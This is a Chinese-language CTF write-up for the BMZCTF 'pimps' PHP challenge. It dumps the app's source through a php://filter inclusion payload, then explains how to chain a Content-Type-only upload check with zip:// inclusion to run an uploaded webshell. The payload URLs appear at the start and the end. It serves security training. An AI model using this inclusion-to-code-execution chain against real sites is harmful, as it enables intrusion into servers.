BMZCTF：pimps

http://www.bmzclub.cn/challenges#pimps

疑似文件包含点，尝试伪协议读取源码

/?op=php://filter/convert.base64-encode/resource=index

index.php

<?php
error_reporting(0);
define('FROM_INDEX', 1);

$op = empty($_GET['op']) ? 'home' : $_GET['op'];
if(!is_string($op) || preg_match('/\.\./', $op))
    die('Try it again and I will kill you! I fucking hate hackers! Pandadmin.');
ob_start('ob_gzhandler');

function page_top($op) {
?><!DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<title>Panduploader :: <?= htmlentities(ucfirst($op)); ?></title>
</head>
<body>
	<div id="header">
		<center><a href="?op=home" class="logo"><img src="images/logo.png" alt=""></a></center>
	</div>
	<div id="body">
<?php
}

function fatal($msg) {
?><div class="article">
<h2>Error</h2>
<p><?=$msg;?></p>
</div><?php
exit(1);
}

function page_bottom() {
?>
    </div>
    <center>
	<div id="footer">
		<div>
			<p>
				<span>2016 &copy; 1337 Pandas Corporation.</span> All rights reserved.
			</p>
		</div>
	</div>
	</center>
</body>
</html><?php
ob_end_flush();
}

register_shutdown_function('page_bottom');

page_top($op);

if(!(include $op . '.php'))
    fatal('no such page');
?>

upload.php

<?php
include 'common.php';

if(isset($_POST['submit']) && isset($_FILES['image'])) {
    $fn = $_FILES['image']['tmp_name'];
    $ft = $_FILES['image']['type'];

    if(!is_uploaded_file($fn)) {
        fatal('uploaded file corrupted');
    }

    $array = array('image/png');
    if(!in_array($ft,$array)){
        fatal("Sorry, only PNG files are allowed.");
    }

    $imagekey = create_image_key();

    move_uploaded_file($fn, "uploads/$imagekey.png");

    header("Location: ?op=show&imagekey=$imagekey");

} else {
?>
<center>
<div class="article">
    <h2>Upload your own png file</h2>
    <form enctype="multipart/form-data" action="?op=upload" method="POST">
        <label for="image">Image file (max <?=MAX_IM_SIZE;?>x<?=MAX_IM_SIZE;?>): </label>
        <input type="file" id="image" name="image" />
        <br />
        <input type="submit" name="submit" value="Upload!" />
    </form>
</div>
</center>
<?php
}
?>

common.php

<?php
if(!defined('FROM_INDEX')) die();

define('MAX_IM_SIZE', 100);

function create_image_key() {
    return sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT'] . time() . mt_rand());
}

function load_image($imagekey) {
    if(1 !== preg_match('/[0-9a-f]{40}/', $imagekey)) {
        fatal('Invalid image key.');
    }

    $im = imagecreatefrompng("uploads/{$imagekey}.png");
    if(!$im) {
        fatal('Failed to load image.');
    }
    return $im;
}
?>

home.php

<?php
include 'common.php';
?>
<center>
<div class="article">
    <h2>Welcome to Pandauploader!</h2>
    <p>
        Pandauploader let you upload PNG image files and store it! Have fun with the pandas all for free!<br/>
    </p>
    <p>
        Get started by <a href="?op=upload">uploading a picture</a>
    </p>

</div>
</center>

审计源码，有包含点，但是控制了后缀，只能包含php文件，有上传点，上传只验证content-type即可上传，但是$imagekey.png限制了文件名为png。没有限制上传文件的内容，包含点可以使用zip://伪协议。zip://可以动态的解压压缩文件，并且可以访问其中的压缩文件。最重要的是不需要指定文件的后缀名，任何文件后缀都行，只要是压缩文件的文件内容格式能解压并访问

讲shell压缩，然后修改后缀为png后者直接上传zip抓包修改content-type

zip://[上传的压缩包路径]%23[压缩文件名称]

/?op=zip://uploads/7f67a5c01bf194128e1a7fe0930a85894b62590f.png%23shell